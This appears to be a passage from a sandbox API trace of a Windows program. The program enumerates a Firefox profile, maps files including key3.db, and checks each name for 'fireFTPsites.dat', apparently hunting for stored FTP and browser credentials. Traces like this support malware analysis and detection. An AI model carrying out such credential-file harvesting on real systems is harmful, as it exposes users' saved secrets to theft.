(lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\.metadata"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0590.283] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x0 [0590.283] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x0 [0590.283] CloseHandle (hObject=0x668) returned 1 [0590.283] LocalFree (hMem=0x63fd00) returned 0x0 [0590.283] StrStrIW (lpFirst=".metadata", lpSrch="fireFTPsites.dat") returned 0x0 [0590.283] LocalFree (hMem=0x63fb90) returned 0x0 [0590.283] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daac | out: lpFindFileData=0x52daac) returned 1 [0590.283] lstrcmpiW (lpString1="idb", lpString2=".") returned 1 [0590.283] lstrcmpiW (lpString1="idb", lpString2="..") returned 1 [0590.283] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0590.283] lstrlenW (lpString="\\") returned 1 [0590.283] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0590.283] LocalAlloc (uFlags=0x40, uBytes=0x156) returned 0x63fa30 [0590.283] lstrlenW (lpString="idb") returned 3 [0590.284] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\") returned 106 [0590.284] LocalAlloc (uFlags=0x40, uBytes=0x15c) returned 0x63fb90 [0590.284] LocalFree (hMem=0x63fa30) returned 0x0 [0590.284] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0590.284] lstrlenW (lpString="\\*.*") returned 4 [0590.284] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0590.284] LocalAlloc (uFlags=0x40, uBytes=0x164) returned 0x63fcf8 [0590.284] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\*.*", lpFindFileData=0x52d834 | out: lpFindFileData=0x52d834) returned 0x5b9b50 [0590.284] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.284] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d834 | out: lpFindFileData=0x52d834) returned 1 [0590.284] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.284] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.284] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d834 | out: lpFindFileData=0x52d834) returned 1 [0590.284] lstrcmpiW (lpString1="818200132aebmoouht", lpString2=".") returned 1 [0590.284] lstrcmpiW (lpString1="818200132aebmoouht", lpString2="..") returned 1 [0590.284] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0590.284] lstrlenW (lpString="\\") returned 1 [0590.284] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0590.284] LocalAlloc (uFlags=0x40, uBytes=0x15e) returned 0x63fe68 [0590.284] lstrlenW (lpString="818200132aebmoouht") returned 18 [0590.284] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 110 [0590.284] LocalAlloc (uFlags=0x40, uBytes=0x182) returned 0x2ef0868 [0590.284] LocalFree (hMem=0x63fe68) returned 0x0 [0590.284] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned 128 [0590.284] lstrlenW (lpString="\\*.*") returned 4 [0590.284] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned 128 [0590.284] LocalAlloc (uFlags=0x40, uBytes=0x18a) returned 0x2ef09f8 [0590.284] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\*.*", lpFindFileData=0x52d5bc | out: lpFindFileData=0x52d5bc) returned 0x5b9b10 [0590.284] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.284] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d5bc | out: lpFindFileData=0x52d5bc) returned 1 [0590.284] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.284] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.284] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d5bc | out: lpFindFileData=0x52d5bc) returned 0 [0590.284] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0590.284] LocalFree (hMem=0x2ef09f8) returned 0x0 [0590.284] LocalFree (hMem=0x2ef0868) returned 0x0 [0590.284] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d834 | out: lpFindFileData=0x52d834) returned 1 [0590.284] lstrlenW (lpString="\\") returned 1 [0590.284] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0590.284] LocalAlloc (uFlags=0x40, uBytes=0x15e) returned 0x63fe68 [0590.284] lstrlenW (lpString="818200132aebmoouht.sqlite") returned 25 [0590.284] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 110 [0590.284] LocalAlloc (uFlags=0x40, uBytes=0x190) returned 0x2ef0868 [0590.284] LocalFree (hMem=0x63fe68) returned 0x0 [0590.284] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c [0590.285] CloseHandle (hObject=0x66c) returned 1 [0590.285] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x88 [0590.285] LocalAlloc (uFlags=0x40, uBytes=0x190) returned 0x2ef0a00 [0590.285] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", lpDst=0x2ef0a00, nSize=0x88 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") returned 0x88 [0590.285] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c [0590.285] CloseHandle (hObject=0x66c) returned 1 [0590.285] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c [0590.285] GetFileSize (in: hFile=0x66c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x258000 [0590.285] CreateFileMappingW (hFile=0x66c, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4e0 [0590.285] MapViewOfFile (hFileMappingObject=0x4e0, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3800000 [0590.304] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57bba0 [0590.304] UnmapViewOfFile (lpBaseAddress=0x3800000) returned 1 [0590.309] CloseHandle (hObject=0x4e0) returned 1 [0590.309] CloseHandle (hObject=0x66c) returned 1 [0590.309] LocalFree (hMem=0x2ef0a00) returned 0x0 [0590.309] StrStrIW (lpFirst="818200132aebmoouht.sqlite", lpSrch="fireFTPsites.dat") returned 0x0 [0590.309] LocalFree (hMem=0x2ef0868) returned 0x0 [0590.309] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d834 | out: lpFindFileData=0x52d834) returned 0 [0590.309] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0590.309] LocalFree (hMem=0x63fcf8) returned 0x0 [0590.309] LocalFree (hMem=0x63fb90) returned 0x0 [0590.309] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daac | out: lpFindFileData=0x52daac) returned 0 [0590.309] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0590.309] LocalFree (hMem=0x63f8c8) returned 0x0 [0590.309] LocalFree (hMem=0x5e6108) returned 0x0 [0590.309] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd24 | out: lpFindFileData=0x52dd24) returned 0 [0590.309] FindClose (in: hFindFile=0x57ca60 | out: hFindFile=0x57ca60) returned 1 [0590.309] LocalFree (hMem=0x56cab0) returned 0x0 [0590.309] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.309] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52df9c | out: lpFindFileData=0x52df9c) returned 1 [0590.309] lstrlenW (lpString="\\") returned 1 [0590.309] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.309] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.309] lstrlenW (lpString="key3.db") returned 7 [0590.309] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.309] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x63bbf0 [0590.309] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.309] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\key3.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.309] CloseHandle (hObject=0x4c8) returned 1 [0590.309] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x54 [0590.309] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x63bd28 [0590.309] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db", lpDst=0x63bd28, nSize=0x54 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db") returned 0x54 [0590.309] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\key3.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.309] CloseHandle (hObject=0x4c8) returned 1 [0590.309] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\key3.db"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.310] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4000 [0590.310] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0590.310] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.310] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57bc30 [0590.310] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.310] CloseHandle (hObject=0x660) returned 1 [0590.310] CloseHandle (hObject=0x4c8) returned 1 [0590.310] LocalFree (hMem=0x63bd28) returned 0x0 [0590.310] StrStrIW (lpFirst="key3.db", lpSrch="fireFTPsites.dat") returned 0x0 [0590.310] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.310] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52df9c | out: lpFindFileData=0x52df9c) returned 1 [0590.310] lstrlenW (lpString="\\") returned 1 [0590.310] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.310] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.310] lstrlenW (lpString="localstore.rdf") returned 14 [0590.310] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.310] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56cab0 [0590.310] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.311] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\localstore.rdf"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.311] CloseHandle (hObject=0x4c8) returned 1 [0590.311] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0590.311] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x2ed9860 [0590.311] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf", lpDst=0x2ed9860, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf") returned 0x5b [0590.311] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\localstore.rdf"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.311] CloseHandle (hObject=0x4c8) returned 1 [0590.311] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\localstore.rdf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.311] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4fe [0590.311] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0590.311] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.311] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57bcc0 [0590.311] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.311] CloseHandle (hObject=0x660) returned 1 [0590.311] CloseHandle (hObject=0x4c8) returned 1 [0590.311] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.312] StrStrIW (lpFirst="localstore.rdf", lpSrch="fireFTPsites.dat") returned 0x0 [0590.312] LocalFree (hMem=0x56cab0) returned 0x0 [0590.312] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52df9c | out: lpFindFileData=0x52df9c) returned 1 [0590.312] lstrlenW (lpString="\\") returned 1 [0590.312] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.312] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.312] lstrlenW (lpString="marionette.log") returned 14 [0590.312] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.312] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56cab0 [0590.312] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.312] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\marionette.log"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.312] CloseHandle (hObject=0x4c8) returned 1 [0590.312] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0590.312] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x2ed9860 [0590.312] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log", lpDst=0x2ed9860, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log") returned 0x5b [0590.312] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\marionette.log"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.312] CloseHandle (hObject=0x4c8) returned 1 [0590.312] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\marionette.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.312] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x39 [0590.312] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0590.312] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.312] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57bd50 [0590.312] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.313] CloseHandle (hObject=0x660) returned 1 [0590.313] CloseHandle (hObject=0x4c8) returned 1 [0590.313] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.313] StrStrIW (lpFirst="marionette.log", lpSrch="fireFTPsites.dat") returned 0x0 [0590.313] LocalFree (hMem=0x56cab0) returned 0x0 [0590.313] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52df9c | out: lpFindFileData=0x52df9c) returned 1 [0590.313] lstrlenW (lpString="\\") returned 1 [0590.313] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.313] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.313] lstrlenW (lpString="mimeTypes.rdf") returned 13 [0590.313] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.313] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56cab0 [0590.313] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.313] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\mimetypes.rdf"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.313] CloseHandle (hObject=0x4c8) returned 1 [0590.313] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5a [0590.313] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x2ed9860 [0590.313] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf", lpDst=0x2ed9860, nSize=0x5a | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf") returned 0x5a [0590.313] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\mimetypes.rdf"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.313] CloseHandle (hObject=0x4c8) returned 1 [0590.313] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\mimetypes.rdf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0590.313] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xef3 [0590.313] CreateFileMappingW (hFile=0x4c8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0590.313] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.314] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57bde0 [0590.314] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.314] CloseHandle (hObject=0x660) returned 1 [0590.314] CloseHandle (hObject=0x4c8) returned 1 [0590.314] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.314] StrStrIW (lpFirst="mimeTypes.rdf", lpSrch="fireFTPsites.dat") returned 0x0 [0590.314] LocalFree (hMem=0x56cab0) returned 0x0 [0590.314] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52df9c | out: lpFindFileData=0x52df9c) returned 1 [0590.314] lstrcmpiW (lpString1="minidumps", lpString2=".") returned 1 [0590.314] lstrcmpiW (lpString1="minidumps", lpString2="..") returned 1 [0590.314] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.314] lstrlenW (lpString="\\") returned 1 [0590.314] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.314] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.314] lstrlenW (lpString="minidumps") returned 9 [0590.314] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.314] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x63bbf0 [0590.314] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.314] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\minidumps") returned 85 [0590.314] lstrlenW (lpString="\\*.*") returned 